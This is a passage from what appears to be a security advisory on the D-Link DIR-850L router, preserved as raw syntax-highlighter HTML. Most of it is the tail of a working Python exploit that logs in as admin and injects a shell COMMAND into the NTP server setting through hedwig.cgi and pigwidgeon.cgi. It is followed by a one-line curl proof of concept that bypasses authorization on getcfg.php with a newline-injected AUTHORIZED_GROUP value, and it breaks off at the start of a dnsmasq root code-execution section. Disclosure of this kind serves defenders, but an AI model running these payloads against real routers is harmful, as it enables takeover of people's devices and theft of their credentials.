class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;challenge&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-87\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-88\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">update<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;uid&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;uid&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-89\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-90\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Auth login&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-91\"><span class=\"crayon-v\">user_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Admin&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-92\"><span class=\"crayon-v\">user_pasw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">admin_pasw<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-598a38e8ac95e008713212-93\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-94\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;id&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_name<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;password&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hmac<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user_pasw<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;challenge&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;md5&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdigest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">upper<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-97\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-98\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/authentication.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-99\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-100\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-101\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">json<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">loads<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-102\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;status&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">lower<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ok&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-103\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-104\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-106\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;OK&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-598a38e8ac95e008713212-107\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-108\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-109\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-110\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;SERVICES&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;DEVICE.TIME&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-111\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/getcfg.php&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-112\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-113\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-114\"><span 
class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-115\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/\/ntp\/enable&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-116\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/\/ntp\/server&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;metelesku; (&#8220;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">COMMAND<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;) &amp; exit; &#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-117\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/\/ntp6\/enable&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-118\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-119\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-120\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-121\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;hedwig&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-122\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-123\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;Content-Type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;text\/xml&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-124\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tostring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-125\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/hedwig.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-126\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-127\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-128\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-129\"><span class=\"crayon-v\">result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">findtext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;result&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-130\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">lower<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ok&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-134\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;OK&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-135\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-136\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-137\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-138\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;pigwidgeon&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-139\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-140\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;ACTIONS&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;SETCFG,ACTIVATE&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-141\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/pigwidgeon.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-142\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-143\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-144\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-145\"><span class=\"crayon-v\">result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">findtext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;result&#8221;<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-146\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">lower<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ok&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-149\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-150\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;OK&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0135 seconds] -->  <\/p>\n<p><strong>Remote Unauthenticated Information Disclosure via WAN and 
LAN<\/strong><br \/> When an admin logs in to the D-Link 850L, the global variable is set so that <em>$AUTHORIZED_GROUP >= 1<\/em>.<\/p>\n<p>An attacker can use this global variable to bypass the security checks and read arbitrary files.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac963141374217\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" 
data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $ curl -d &quot;SERVICES=DEVICE.ACCOUNT&amp;x=y%0aAUTHORIZED_GROUP=1&quot;  &quot;http:\/\/IP\/getcfg.php&quot;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac963141374217-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac963141374217-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac963141374217-1\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;SERVICES=DEVICE.ACCOUNT&amp;x=y%0aAUTHORIZED_GROUP=1&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac963141374217-2\"><span class=\"crayon-s\">&quot;http:\/\/IP\/getcfg.php&quot;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p><strong>Unauthorized Remote Code Execution as root via LAN<\/strong><\/p>\n<p>The D-Link 850L runs the <em>dnsmasq<\/em> daemon as root. The daemon executes the &#8220;host-name&#8221; parameter from the DHCP server. 
